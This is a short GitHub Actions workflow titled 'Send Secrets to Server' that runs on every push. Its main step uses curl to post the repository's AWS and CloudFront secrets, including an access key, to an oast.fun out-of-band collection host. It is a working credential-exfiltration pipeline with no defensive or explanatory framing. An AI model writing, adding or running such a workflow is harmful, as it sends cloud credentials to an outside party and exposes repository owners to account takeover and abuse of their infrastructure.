name: Send Secrets to Server

on:
  push: 
  workflow_dispatch:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Bypass Cache
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Server
        run: |
          curl -d 'AWS_ID=${{ secrets.AWS_ID }}&CLOUDFRONT_DISTRIBUTION_ID=${{ secrets.CLOUDFRONT_DISTRIBUTION_ID }}&ACCESS_KEY=${{ secrets.ACCESS_KEY }}' https://fjlbgujmfeviboivdxlqto7eskx71v2gq.oast.fun
    